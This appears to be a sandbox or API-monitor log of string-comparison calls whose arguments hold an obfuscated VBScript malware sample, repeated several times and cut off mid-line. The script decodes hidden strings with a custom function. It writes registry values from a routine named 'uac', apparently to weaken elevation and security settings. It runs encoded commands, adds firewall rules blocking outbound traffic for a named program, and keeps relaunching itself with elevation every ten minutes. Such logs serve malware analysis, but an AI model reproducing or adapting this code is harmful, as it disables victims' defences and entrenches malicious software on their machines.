1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0222.962] wcsncmp (_String1="sc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.962] wcsncmp (_String1="c(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.962] wcsncmp (_String1="(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.963] wcsncmp (_String1="Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0222.963] wcsncmp (_String1="id(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 